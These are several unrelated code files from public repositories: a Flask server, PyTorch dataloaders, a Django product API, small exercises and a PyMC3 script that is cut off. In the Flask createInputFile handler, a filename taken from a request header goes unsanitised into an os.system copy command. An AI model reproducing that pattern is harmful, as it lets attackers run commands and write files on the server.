app.logger.info(\"Session not active\")\n response = RequestApiUtil.create_json_object(\n \"Session not active\",\n response_type=\"ERROR\",\n status_code=HTTPStatus.UNAUTHORIZED,\n )\n return response, HTTPStatus.UNAUTHORIZED\n\n\n@app.route(\"/api/tanzu/logout\", methods=[\"GET\"])\ndef logout():\n user = session.get(\"username\")\n if user is None:\n is_active = False\n else:\n is_active = True\n if is_active:\n session.pop(\"username\", None)\n app.logger.info(\"User successfully logged out\")\n response = RequestApiUtil.create_json_object(\"User successfully logged out\", status_code=HTTPStatus.OK)\n return response, HTTPStatus.OK\n else:\n app.logger.info(\"No active session found\")\n response = RequestApiUtil.create_json_object(\"No active session found\", status_code=HTTPStatus.OK)\n return response, HTTPStatus.OK\n\n\n@app.route(\"/api/tanzu/createinputfile\", methods=[\"POST\"])\n@token_required\ndef createInputFile(current_user):\n user = current_user.name\n home_dir = os.path.join(\"/home\", user)\n try:\n filename = home_dir + \"/\" + request.headers[\"filename\"]\n if not os.path.exists(home_dir):\n os.makedirs(home_dir)\n except Exception:\n app.logger.error(\"No filename passed\")\n return \"No filename passed\", 400\n if filename is None:\n return \"No filename passed\", 400\n try:\n jsonInput = request.get_json(force=True)\n json_object_m = json.dumps(jsonInput, indent=4)\n name, file_ext = os.path.splitext(filename)\n # MAPBU-1694, whenever there is an existing deployment file, it needs to be saved, with _counter, so that user\n # can re-use them and new file saved with same name\n if os.path.isfile(filename):\n i = 1\n while os.path.isfile(f\"{name}_{i}{file_ext}\"):\n i += 1\n new_filename = f\"{name}_{i}{file_ext}\"\n os.system(f\"cp {filename} {new_filename}\")\n with open(filename, \"w\") as outfile:\n outfile.write(json_object_m)\n except Exception as e:\n app.logger.error(\"Failed to generate the json file \" + str(e))\n d = {\"responseType\": \"ERROR\", \"msg\": \"Failed to generate the json file \" + str(e), \"STATUS_CODE\": 500}\n return jsonify(d), 500\n app.logger.info(\"Successfully generated input file\")\n d = {\"responseType\": \"SUCCESS\", \"msg\": \"Successfully generated input file\", \"STATUS_CODE\": 200}\n return jsonify(d), 200\n\n\n@app.route(\"/api/tanzu/logbundle\", methods=[\"GET\"])\n@token_required\ndef download_log_bundle(current_user):\n path = \"/var/log/server\"\n app.logger.info(f\"*************Downloading log files {path}************\")\n if not os.path.isdir(\"/tmp/logbundle\"):\n command = [\"mkdir\", \"/tmp/logbundle\"]\n runShellCommandAndReturnOutputAsList(command)\n zip_path = \"/tmp/logbundle/service_installer_log_bundle.zip\"\n with ZipFile(zip_path, \"w\") as newzip:\n for folderName, subfolders, filenames in os.walk(path):\n for filename in filenames:\n # create complete filepath of file in directory\n filePath = os.path.join(folderName, filename)\n # Add file to zip\n newzip.write(filePath, basename(filePath))\n return send_file(zip_path, as_attachment=True)\n\n\nif __name__ == \"__main__\":\n FlaskInjector(app=app, modules=[configure])\n from waitress import serve\n\n serve(app, port=5000)\n","repo_name":"vmware-tanzu/service-installer-for-vmware-tanzu","sub_path":"src/python_server.py","file_name":"python_server.py","file_ext":"py","file_size_in_byte":15442,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"72"} +{"seq_id":"39010196390","text":"#!/usr/bin/env python3\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport numbers\nimport math\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\nimport torchvision\nfrom torchvision import transforms\n\nclass FlowDataset(Dataset):\n \"\"\"Flow Attention Dataset.\n \n Args:\n labels_path (string): path to text file with annotations\n transform (callable): transform to be applied on image\n\n Returns:\n torch.utils.data.Dataset: dataset object\n \"\"\"\n\n def __init__(self, labels_path, transform=None):\n # read video path and labels\n with open(labels_path, 'r') as f:\n data = f.read()\n data = data.split()\n data = np.array(data)\n data = np.reshape(data, (-1, 2))\n\n np.random.shuffle(data)\n self.data = data\n self.transform = transform\n\n def __len__(self):\n \"\"\"\n Retrieve Dataset Length.\n \"\"\"\n return len(self.data)\n\n def __getitem__(self, idx):\n \"\"\"\n Retrieve Next Item in Dataset.\n\n @return sample: sample['X'] contains input data while sample['y']\n contains attention label.\n \"\"\"\n video_path = self.data[idx, 0]\n # change to flow dataset\n video_path_flow = video_path[:45] + '_flow' + video_path[45:]\n y = int(self.data[idx, 1]) - 1\n X_flow = np.load(video_path_flow)\n # transform data\n if self.transform:\n X_flow = self.transform(X_flow)\n\n # reformat [numSeqs x numChannels x Height x Width]\n X_flow = np.transpose(X_flow, (0,3,1,2))\n # store in sample\n sample = {'X': X_flow, 'y': y}\n return sample\n\nclass TwostreamDataset(Dataset):\n \"\"\"Twostream Attention Dataset.\n \n Args:\n labels_path (string): path to text file with annotations\n transform (callable): transform to be applied on image\n\n Returns:\n torch.utils.data.Dataset: dataset for raw image frames and ``flow\n images.``\n \"\"\"\n\n def __init__(self, labels_path, transform=None):\n # read video path and labels\n with open(labels_path, 'r') as f:\n data = f.read()\n data = data.split()\n data = np.array(data)\n data = np.reshape(data, (-1, 2))\n\n np.random.shuffle(data)\n self.data = data\n self.transform = transform\n\n def __len__(self):\n \"\"\"\n Retrieve Dataset Length.\n \"\"\"\n return len(self.data)\n\n def __getitem__(self, idx):\n \"\"\"\n Retrieve Next Item in Dataset.\n\n @return sample: sample['X'] contains input data while sample['y']\n contains attention label.\n \"\"\"\n video_path = self.data[idx, 0]\n # change to flow dataset\n video_path_flow = video_path[:45] + '_flow' + video_path[45:]\n y = int(self.data[idx, 1]) - 1\n X = np.load(video_path)\n X_flow = np.load(video_path_flow)\n # transform data\n if self.transform:\n X = self.transform(X)\n X_flow = self.transform(X_flow)\n\n # combine into one stream (remove first sequence of appearance feats)\n X = X[1:]\n X_combine = np.vstack((X, X_flow))\n # reformat [numSeqs x numChannels x Height x Width]\n X = np.transpose(X_combine, (0,3,1,2))\n # store in sample\n sample = {'X': X, 'y': y}\n return sample\n\nclass AttentionDataset(Dataset):\n \"\"\"Attention Level Dataset.\n \n Args:\n labels_path (string): path to text file with annotations\n transform (callable): transform to be applied on image\n\n Returns:\n torch.utils.data.Dataset: dataset object\n \"\"\"\n\n def __init__(self, labels_path, transform=None):\n # read video paths and labels\n with open(labels_path, 'r') as f:\n data = f.read()\n data = data.split()\n data = np.array(data)\n data = np.reshape(data, (-1, 2))\n \n np.random.shuffle(data)\n self.data = data\n self.transform = transform\n \n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n video_path = self.data[idx, 0]\n y = int(self.data[idx, 1]) - 1\n X = np.load(video_path)\n # transform data\n if self.transform:\n X_sample = self.transform(X)\n\n # reformat [numSeqs x numChannels x Height x Width]\n X_sample = np.transpose(X_sample, (0,3,1,2))\n # store in sample\n sample = {'X': X_sample, 'y': y}\n return sample\n\nclass Resize():\n \"\"\"Resize frames in video sequence to a given size.\n\n Args:\n output_size (tuple): Desired output size.\n \"\"\"\n def __init__(self, output_size):\n assert isinstance(output_size, tuple)\n self.output_size = output_size\n\n def __call__(self, video):\n \"\"\"\n Args:\n video (ndarray): Video to be resized.\n\n Returns:\n ndarray: Resized video.\n \"\"\"\n video_new = np.zeros(\n (len(video), *self.output_size, video.shape[3]),\n dtype=np.uint8\n )\n # resize each frame\n for idx, frame in enumerate(video):\n video_new[idx] = cv2.resize(frame, self.output_size)\n \n return video_new\n\nclass CenterCrop():\n \"\"\"Crop frames in video sequence at the center.\n\n Args:\n output_size (tuple): Desired output size of crop.\n \"\"\"\n \n def __init__(self, output_size):\n assert isinstance(output_size, tuple)\n self.output_size = output_size\n\n def __call__(self, video):\n \"\"\"\n Args:\n video (ndarray): Video to be center-cropped.\n \n Returns:\n ndarray: Center-cropped video.\n \"\"\"\n # hold transformed video\n video_new = np.zeros(\n (video.shape[0], *self.output_size, video.shape[3]),\n dtype=video.dtype\n )\n h, w = video.shape[1:3]\n new_h, new_w = self.output_size\n top = (h - new_h) // 2\n left = (w - new_w) // 2\n # center crop each frame\n for idx, frame in enumerate(video):\n video_new[idx] = frame[top: top + new_h, left: left + new_w]\n\n return video_new\n\nclass RandomCrop():\n \"\"\"Crop randomly the frames in a video sequence.\n\n Args:\n output_size (tuple): Desired output size.\n \"\"\"\n def __init__(self, output_size):\n assert isinstance(output_size, tuple)\n self.output_size = output_size\n\n def __call__(self, video):\n \"\"\"\n Args:\n video (ndarray): Video to be cropped.\n\n Returns:\n ndarray: Cropped video.\n \"\"\"\n # hold transformed video\n video_new = np.zeros(\n (video.shape[0], *self.output_size, video.shape[3]),\n dtype=video.dtype\n )\n h, w = video.shape[1:3]\n new_h, new_w = self.output_size\n top = np.random.randint(0, h - new_h)\n left = np.random.randint(0, w - new_w)\n # randomly crop each frame\n for idx, frame in enumerate(video):\n video_new[idx] = frame[top: top + new_h, left: left + new_w]\n\n return video_new\n\nclass RandomHorizontalFlip():\n \"\"\"Horizontally flip a video sequence.\n\n Args:\n p (float): Probability of image being flipped. Default value is 0.5.\n \"\"\"\n def __init__(self, p=0.5):\n self.p = p\n\n def __call__(self, video):\n \"\"\"\n Args:\n video (ndarray): Video to be flipped.\n\n Returns:\n ndarray: Randomly flipped video.\n \"\"\"\n # check to perform flip\n if random.random() < self.p:\n # hold transformed video\n video_new = np.zeros_like(video)\n # flip each frame\n for idx, frame in enumerate(video):\n video_new[idx] = cv2.flip(frame, 1)\n\n return video_new\n\n return video\n\nclass RandomRotation():\n \"\"\"Rotate video sequence by an angle.\n\n Args:\n degrees (float or int): Range of degrees to select from.\n \"\"\"\n \n def __init__(self, degrees):\n assert isinstance(degrees, numbers.Real)\n self.degrees = degrees\n\n def __call__(self, video):\n \"\"\"\n Args:\n video (ndarray): Video to be rotated.\n\n Returns:\n ndarray: Randomly rotated video.\n \"\"\"\n # hold transformed video\n video_new = np.zeros_like(video)\n h, w = video.shape[1:3]\n # random rotation\n angle = np.random.uniform(-self.degrees, self.degrees)\n # create rotation matrix with center point at the center of frame\n M = cv2.getRotationMatrix2D((w//2,h//2), angle, 1)\n # rotate each frame\n for idx, frame in enumerate(video):\n video_new[idx] = cv2.warpAffine(frame, M, (w,h))\n \n return video_new\n\nclass Normalize():\n \"\"\"Normalize video with mean and standard deviation.\n Given mean: ``(M1,...,Mn)`` and std: ``(S1,..,Sn)`` for ``n`` channels, this\n transform will normalize each channge of the input video.\n\n Args:\n mean (list): Sequence of means for each channel.\n std (list): Sequence of standard deviations for each channel.\n \"\"\"\n\n def __init__(self, mean, std):\n assert isinstance(mean, list)\n assert isinstance(std, list)\n self.mean = np.array(mean, dtype=np.float32)\n self.std = np.array(std, dtype=np.float32)\n # reverse order since images are read with opencv (i.e. BGR)\n self.mean = np.flip(self.mean, 0)\n self.std = np.flip(self.std, 0)\n\n def __call__(self, video):\n \"\"\"\n Args:\n video (ndarray): Video to be normalized\n\n Returns:\n ndarray: Normalized video.\n \"\"\"\n video = video / 255\n video = (video - self.mean) / self.std\n video = np.asarray(video, dtype=np.float32)\n return video\n\ndef get_loaders(labels_path, datatype, batch_size, num_workers, gpu=True):\n \"\"\"Return dictionary of torch.utils.data.DataLoader.\n\n Args:\n labels_path (string): path to text file with annotations\n datatype (string): dataset being used\n batch_size (int): number of instances in batch\n num_workers (int): number of subprocesses used for data loading\n flow (bool): if using flow dataset\n gpu (bool): presence of gpu (default is true)\n\n Returns:\n torch.utils.data.DataLoader: dataloader for custom dataset\n dictionary: dataset length for training and \n validation\n \"\"\"\n # data augmentation and normalization for training\n # just normalization for validation\n data_transforms = {\n 'Train': transforms.Compose([\n Resize((256,256)),\n RandomCrop((224,224)),\n RandomHorizontalFlip(),\n RandomRotation(15),\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n 'Valid': transforms.Compose([\n Resize((256,256)),\n CenterCrop((224,224)),\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n }\n\n # create dataset object\n if datatype == 'flow':\n datasets = {x: FlowDataset(\n labels_path, data_transforms[x]\n ) for x in ['Train', 'Valid']}\n elif datatype == 'raw':\n datasets = {x: AttentionDataset(\n labels_path, data_transforms[x]\n ) for x in ['Train', 'Valid']}\n elif datatype == 'twostream':\n datasets = {x: TwostreamDataset(\n labels_path, data_transforms[x]\n ) for x in ['Train', 'Valid']}\n\n # random split for training and validation\n num_instances = len(datasets['Train'])\n indices = list(range(num_instances))\n split = math.floor(num_instances * 0.8)\n train_indices, valid_indices = indices[:split], indices[split:]\n samplers = {'Train': SubsetRandomSampler(train_indices),\n 'Valid': SubsetRandomSampler(valid_indices)}\n \n # dataset sizes\n dataset_sizes = {'Train': len(train_indices),\n 'Valid': len(valid_indices)}\n\n # create dataloders\n dataloaders = {\n x: DataLoader(datasets[x],\n batch_size=batch_size, sampler=samplers[x],\n num_workers=num_workers, pin_memory=gpu)\n for x in ['Train', 'Valid']\n }\n return dataloaders, dataset_sizes\n\ndef main():\n \"\"\"Main Function.\"\"\"\n import time\n\n # hyperparameters\n labels_path = '/usr/local/faststorage/gcorc/accv/average_labels.txt'\n batch_size = 32\n num_workers = 2\n gpu = torch.cuda.is_available()\n\n dataset = TwostreamDataset(labels_path)\n for i in range(len(dataset)):\n sample = dataset[i]\n data = sample['X']\n print(data.shape)\n if i == 0:\n break\n\n# # dictionary of dataloaders\n# dataloaders, dataset_sizes = get_loaders(labels_path, 'twostream', \n# batch_size, num_workers, gpu=True)\n# print('Dataset Sizes:')\n# print(dataset_sizes)\n# print()\n#\n# train_batch = next(iter(dataloaders['Train']))\n# data, labels = train_batch['X'], train_batch['y']\n# print(data.size())\n\nif __name__ == '__main__':\n main()\n","repo_name":"gcorcorann/ComputerRobotVision","sub_path":"src/dataloader_nd.py","file_name":"dataloader_nd.py","file_ext":"py","file_size_in_byte":13609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40617702549","text":"import os\n# ### Use these if project folder is different from module folder\n# revmpath = os.path.expanduser('~/path/to/project/folder/')\n# datapath = os.path.expanduser('~/path/to/project/folder/Data/')\n# ### Use these if project folder contains module folder\n# revmpath = os.path.dirname(os.path.abspath(__file__)).replace('pvvm','')\n# datapath = os.path.dirname(os.path.abspath(__file__)).replace('pvvm', 'Data/')\n########### CUSTOM ###########\nrevmpath = os.path.expanduser('~/Desktop/pvvmtest1/')\ndatapath = os.path.expanduser('~/Desktop/pvvmtest1/Data/')\n##############################\n\napikeys = {\n ### Get a googlemaps API key at \n ### https://developers.google.com/maps/documentation/geocoding/get-api-key\n 'googlemaps': 'yourAPIkey',\n ### Get an NSRDB key at https://developer.nrel.gov/signup/\n 'nsrdb': 'yourAPIkey',\n}\nnsrdbparams = {\n ### Use '+' for spaces\n 'full_name': 'your+name',\n 'email': 'your@email.com',\n 'affiliation': 'your+affiliation',\n 'reason': 'your+reason',\n 'mailing_list': 'true',\n}\n","repo_name":"patrickbrown4/pvvm_pvtos","sub_path":"pvvm/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"36978998814","text":"from keras.models import load_model\nimport pandas as pd\n\nmodel = load_model('HRD_using_cnn_opencv.h5')\n\n\npredictions = model.predict_classes(test, verbose=1)\npd.DataFrame({\"ImageId\":list(range(1,len(predictions)+1)),\n \"Label\":predictions}).to_csv(\"KAGGLE_SUBMISSION_FILE\",\n index=False,\n header=True)","repo_name":"anwarshaikh078/Kaggle_Competitions","sub_path":"Digit Recognizer/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23287089717","text":"\"\"\"View module for handling requests about products\"\"\"\nfrom django.http import HttpResponseServerError\nfrom rest_framework.viewsets import ViewSet\nfrom rest_framework.response import Response\nfrom rest_framework import serializers\nfrom rest_framework import status\nfrom bangazonAPI.models import Product, ProductType\n\nclass ProductSerializer(serializers.HyperlinkedModelSerializer):\n \"\"\"JSON serializer for products\n\n Arguments:\n serializers.HyperlinkedModelSerializer\n \"\"\"\n class Meta:\n model = Product\n url = serializers.HyperlinkedIdentityField(\n view_name='products',\n lookup_field='id'\n )\n fields = ('id', 'url', 'name', 'customer_id', 'customer', 'price', 'description','quantity', 'location', 'image_path', 'created_at', 'product_type_id', 'product_type')\n depth = 3\n\nclass Products (ViewSet):\n \"\"\"Products for Bangazon\"\"\"\n # handles GET all\n def list(self, request):\n \"\"\"Handle GET requests for all products\n\n Returns:\n Response -- JSON serialized product instance\n \"\"\"\n limit = self.request.query_params.get('limit')\n category = self.request.query_params.get('category', None)\n user = self.request.query_params.get('self')\n\n location = self.request.query_params.get('location')\n\n product_name = self.request.query_params.get('name')\n\n # filter for the 'home' view\n if limit:\n products = Product.objects.order_by('-created_at')[0:int(limit)]\n elif category is not None:\n products = Product.objects.filter(product_type_id=category)\n # filter for the 'myProducts' view\n elif user == \"true\":\n products = Product.objects.filter(customer_id=request.auth.user.customer.id)\n else:\n products = Product.objects.all()\n\n # filters for Search\n if location is not None:\n products = products.filter(location = location)\n\n if product_name is not None:\n products = products.filter(name = product_name)\n\n\n serializer = ProductSerializer(\n products,\n many=True,\n context={'request': request}\n )\n\n\n return Response(serializer.data)\n\n # handles GET one\n def retrieve(self, request, pk=None):\n \"\"\"Handle GET requests for single product\n\n Returns:\n Response -- JSON serialized product instance\n \"\"\"\n try:\n product = Product.objects.get(pk=pk)\n serializer = ProductSerializer(product, context={'request': request})\n return Response(serializer.data)\n except Exception as ex:\n return HttpResponseServerError(ex)\n # Handles POSTs\n def create(self, request):\n \"\"\"Handle POST operations\n\n Returns:\n Response -- JSON serialized Product instance\n \"\"\"\n newproduct = Product()\n newproduct.customer_id = request.auth.user.customer.id\n newproduct.name = request.data[\"name\"]\n newproduct.price = request.data[\"price\"]\n newproduct.description = request.data[\"description\"]\n newproduct.quantity = request.data[\"quantity\"]\n newproduct.location = request.data[\"location\"]\n newproduct.image_path = request.data[\"image_path\"]\n newproduct.product_type_id = request.data[\"product_type_id\"]\n\n newproduct.save()\n\n serializer = ProductSerializer(newproduct, context={'request': request})\n\n return Response(serializer.data)\n # handles DELETE\n def destroy(self, request, pk=None):\n \"\"\"Handle DELETE requests for a single product\n\n Returns:\n Response -- 200, 404, or 500 status code\n \"\"\"\n try:\n productItem = Product.objects.get(pk=pk)\n # restrict users to only being able to delete products they've created\n if productItem.customer_id == request.auth.user.customer.id:\n productItem.delete()\n\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n\n except productItem.DoesNotExist as ex:\n return Response({'message': ex.args[0]}, status=status.HTTP_404_NOT_FOUND)\n\n except Exception as ex:\n return Response({'message': ex.args[0]}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n# handles PUT\n def update(self, request, pk=None):\n \"\"\"Handle PUT requests for a product\n\n Returns:\n Response -- Empty body with 204 status code\n \"\"\"\n productItem = Product.objects.get(pk=pk) \n productItem.customer_id = request.auth.user.customer.id\n productItem.name = request.data[\"name\"]\n productItem.price = request.data[\"price\"]\n productItem.description = request.data[\"description\"]\n productItem.quantity = request.data[\"quantity\"]\n productItem.location = request.data[\"location\"]\n productItem.image_path = request.data[\"image_path\"]\n productItem.product_type_id = request.data[\"product_type_id\"]\n productItem.save()\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n","repo_name":"nss-cohort-36/bangazon-api-illin-illusionists-api","sub_path":"bangazonAPI/views/v_product.py","file_name":"v_product.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"38290911907","text":"movie = input()\r\n\r\nstudent_counter = 0\r\nstandard_counter = 0\r\nkids_counter = 0\r\n\r\nwhile movie != \"Finish\":\r\n free_space = int(input())\r\n \r\n current_people = 0\r\n \r\n for t in range(0, free_space):\r\n ticket_type = input()\r\n \r\n if ticket_type == \"End\":\r\n break\r\n \r\n elif ticket_type == \"student\":\r\n student_counter += 1\r\n \r\n elif ticket_type == \"standard\":\r\n standard_counter += 1\r\n \r\n elif ticket_type == \"kid\":\r\n kids_counter += 1\r\n \r\n current_people += 1\r\n \r\n percentage = current_people / free_space * 100\r\n \r\n print(f'{movie} - {percentage:.2f}% full.')\r\n \r\n movie = input()\r\n \r\ntotal_tickets = kids_counter + student_counter + standard_counter\r\nstudent_percent = student_counter / total_tickets * 100\r\nstandard_percent = standard_counter / total_tickets * 100\r\nkids_percent = kids_counter / total_tickets * 100\r\n\r\nprint(f'Total tickets: {total_tickets}')\r\nprint(f'{student_percent:.2f}% student tickets.')\r\nprint(f'{standard_percent:.2f}% standard tickets.')\r\nprint(f'{kids_percent:.2f}% kids tickets.')\r\n","repo_name":"vkostoff/SoftUni_Python","sub_path":"Programming_Basics/Nested_Loops_Lab/cinema_tickets.py","file_name":"cinema_tickets.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14789952869","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def levelOrderBottom(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n if root == None:\n return []\n nodeQueue = []\n flag = 0\n loc = 0\n resultList = []\n nodeQueue.append(root)\n resultList.append([])\n resultList[0].append(root.val)\n print(resultList[0])\n while loc < len(nodeQueue):\n if nodeQueue[loc].left != None:\n nodeQueue.append(nodeQueue[loc].left)\n if nodeQueue[loc].right != None:\n nodeQueue.append(nodeQueue[loc].right)\n if flag == loc and len(nodeQueue)-1 != loc:\n resultList.append([])\n for i in range(flag+1,len(nodeQueue)):\n # print(nodeQueue[i].val)\n resultList[-1].append(nodeQueue[i].val)\n flag = len(nodeQueue)-1\n loc += 1\n resultList.reverse()\n return resultList","repo_name":"Heqingquan/Leetcode-python","sub_path":"Binary Tree Level Order Traversal II.py","file_name":"Binary Tree Level Order Traversal II.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14751781772","text":"import os.path\nfrom enum import Enum, auto\nfrom functools import cache\nfrom typing import Any, Optional\n\nfrom typing_extensions import Self\n\nfrom p3.defaults import RULES_FALLBACK, RULES_FILE\nfrom p3.utils.loggable import Loggable\nfrom p3.utils.override import override\nfrom p3.utils.serializable import SelfSerializable\n\n\nclass Rule(Enum):\n Block = auto()\n Direct = auto()\n Forward = auto()\n\n @classmethod\n def from_str(cls, s: str) -> Self:\n s = s.lower()\n if s == 'block':\n return cls(cls.Block)\n if s == 'direct':\n return cls(cls.Direct)\n if s == 'forward':\n return cls(cls.Forward)\n raise ValueError\n\n\nclass RuleMatcher(SelfSerializable, Loggable):\n rules_fallback: Rule\n rules_file: str\n rules: Optional[dict[str, Rule]]\n\n def __init__(\n self,\n rules_fallback: str = RULES_FALLBACK,\n rules_file: str = RULES_FILE,\n **kwargs,\n ):\n super().__init__(**kwargs)\n self.rules_fallback = Rule.from_str(rules_fallback)\n self.rules_file = rules_file\n self.rules = None\n\n @override(SelfSerializable)\n def to_dict(self) -> dict[str, Any]:\n return {\n 'rules_fallback': self.rules_fallback.name,\n 'rules_file': self.rules_file,\n }\n\n @classmethod\n @override(SelfSerializable)\n def from_dict(cls, obj: dict[str, Any]) -> Self:\n return cls(rules_fallback=obj.get('rules_fallback') or RULES_FALLBACK,\n rules_file=obj.get('rules_file') or RULES_FILE)\n\n def load_rules(self, force: bool = False):\n if not force and self.rules is not None:\n return\n if len(self.rules_file) == 0:\n self.logger.info('skip load rules file')\n return\n if not os.path.exists(self.rules_file):\n self.logger.warning('cannot find rules file: %s', self.rules_file)\n return\n self.rules = dict()\n with open(self.rules_file) as f:\n for line in f:\n line = line.strip()\n if len(line) == 0 or line[0] == '#':\n continue\n try:\n rule, domain = line.split(maxsplit=1)\n if domain not in self.rules:\n self.rules[domain] = Rule.from_str(rule)\n except Exception as e:\n self.logger.warning('except while loading rule %s: %s',\n line, e)\n self.logger.debug('load %d rules', len(self.rules))\n\n @cache\n def match(self, domain: str) -> Rule:\n if self.rules is None:\n return self.rules_fallback\n rule = self.rules.get(domain)\n if rule is not None:\n return rule\n sp = domain.split('.', 1)\n if len(sp) > 1:\n return self.match(sp[1])\n return self.rules_fallback\n","repo_name":"vhqr0/python-proxy-platform","sub_path":"p3/server/rulematcher.py","file_name":"rulematcher.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18865835303","text":"import pymc3 as pm\nimport numpy as np\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport theano.tensor as tt\nfrom theano import shared\nimport pandas as pd\nfrom matplotlib import gridspec\nfrom sklearn.decomposition import PCA, KernelPCA\nfrom Plot_XZ import *\nfrom PCA import *\n\nnp.set_printoptions(precision=0, suppress=True)\nSavefig = 0 # 控制图形显示存储\n\nelec_data = pd.read_csv('XZmulti_6.csv')\n\n# 计算同一公司产品测试地点数目:\ncompanies_num = elec_data.counts.unique()\ncompanies = len(companies_num) # companies=7, 共7个测试地点\ncompany_lookup = dict(zip(companies_num, range(len(companies_num))))\ncompany = elec_data['company_code'] = elec_data.counts.replace(company_lookup).values # 加一行数据在XZsingal文件中\n# companys = elec_data.counts.values - 1 # 这一句以上面两行功能相同\n\n# 计算不同公司数目\ncompany_ABC = elec_data.company.unique()\ncompaniesABC = len(company_ABC) # companies=7, 共7个测试地点\ncompany_lookup_ABC = dict(zip(company_ABC, range(len(company_ABC))))\ncompanyABC = elec_data['company_ABC'] = elec_data.company.replace(company_lookup_ABC).values # 加一行数据在XZsingal文件中\n# companys = elec_data.counts.values - 1 # 这一句以上面两行功能相同\n# elec_count = elec_data.counts.values\n\n# 给所有特征因素加上高斯噪声\nSNR = np.random.normal(0, 2, size=[len(elec_data.Year.values), 4])\n\n# #特征因素分析\nelec_tem = elec_data.Tem.values + SNR[:, 0] # 观测温度值x2\nelec_tem1 = (elec_tem - np.mean(elec_tem)) / np.std(elec_tem)\nelec_hPa = elec_data.hPa.values + SNR[:, 1] # 观测压强x3\nelec_hPa1 = (elec_hPa - np.mean(elec_hPa)) / np.std(elec_hPa)\nelec_RH = elec_data.RH.values + SNR[:, 2] # 观测压强x3\nelec_RH1 = (elec_RH - np.mean(elec_RH)) / np.std(elec_RH)\nelec_Lux = elec_data.Lux.values + SNR[:, 3] # 观测压强x3\nelec_Lux1 = (elec_Lux - np.mean(elec_Lux)) / np.std(elec_Lux)\n\n\n# 计算观测时间,温度,光照等环境条件\nelec_year = elec_data.Year.values # 观测时间值x1\nelec_year1 = (elec_year - np.mean(elec_year)) / np.std(elec_year)\ndata_cs_year = elec_year\n# data_cs_year[42:45] = 12\n# print(data_cs_year)\n\nelec_Pca = np.vstack((elec_tem1, elec_hPa1, elec_RH1, elec_Lux1)).T # 特征数据合并为一个数组\n# elec_Pca2 = np.vstack((elec_tem, elec_hPa, elec_RH, elec_Lux)).T # 特征数据合并为一个数组\n# np.savetxt('XZ_nomean.csv', elec_Pca2, delimiter = ',')\n# =============================================================================================\n# # PCA特征降维,减少相关性,有两种方法,一种是自带函数,一种是网上程序,下面注释为网上程序\n# x, z= pcaa(elec_Pca); XX = np.array(x); ZZ = np.array(z)\n# 将温度等4个特征降维变成2个特征,贡献率为99%以上,满足信息要求; 转换后的特征经过模型后能否还原\n# =============================================================================================\n# #白化,使得每个特征具有相同的方差,减少数据相关性,n_components:控制特征量个数\npca = PCA(n_components=2)\npca.fit(elec_Pca)\n# 将数据X转换成降维后的数据。当模型训练好后,对于新输入的数据,都可以用transform方法来降维。\nelec_Pca1 = pca.transform(elec_Pca)\nelec_Pca1 = np.array(elec_Pca1)\n\nelec_Pca_char1 = elec_Pca1[:, 0] # 降维特征1\nelec_Pca_char2 = elec_Pca1[:, 1] # 降维特征2\n# elec_Pca_char3 = elec_Pca1[:, 2] # 降维特征2\n# print(elec_Pca_char1)\nelec_data.Fault.values[48] =2000\n# 计算故障率大小:故障数目/总测量数,作为模型Y值,放大100倍以增加实际效果,结果中要缩小100倍\nelec_faults = 100 * (elec_data.Fault.values / elec_data.Nums.values) # 数组形式,计算故障率大小\n# elec_faults1 = (elec_faults - np.mean(elec_faults)) / np.std(elec_faults)\n# elec_faults[25] = 3\n# elec_faults[39] = 5\n# elec_faults[53] = 3.8\n# print(elec_faults)\n# 将故障率以6组一行形式组成数组,变成:21*6\nelec_faults2 = np.array([elec_faults[i*6:(i+1)*6] for i in np.arange(21)])\nelec_year2 = np.array([elec_year[i*6:(i+1)*6] for i in np.arange(21)])\nelec_char1 = np.array([elec_Pca_char1[i*6:(i+1)*6] for i in np.arange(21)])\nelec_char2 = np.array([elec_Pca_char2[i*6:(i+1)*6] for i in np.arange(21)])\ncompanyABC2 = np.array([companyABC[i*6:(i+1)*6] for i in np.arange(21)])\n\n# 共享变量设置\nxs_char1 = shared(np.asarray(elec_Pca_char1))\nxs_char2 = shared(np.asarray(elec_Pca_char2))\n\nys_faults = shared(np.asarray(elec_faults))\nxs_year = shared(np.asarray(data_cs_year))\nNum_shared = shared(np.asarray(companyABC))\n# 画图\n# Plot_XZ(elec_year2, elec_faults2, Savefig)\n\ndef logit(x):\n return 1/(1+np.exp(-x))\ndef invlogit(x):\n return tt.exp(x)/(1+tt.exp(x))\ndef Phi(x):\n # probit transform\n return 0.5 + 0.5 * pm.math.erf(x/pm.math.sqrt(2))\n\n\n\n\nimport scipy.linalg\ndef alltrue_elemwise(vals):\n ret = 1\n for c in vals:\n ret = ret * (1 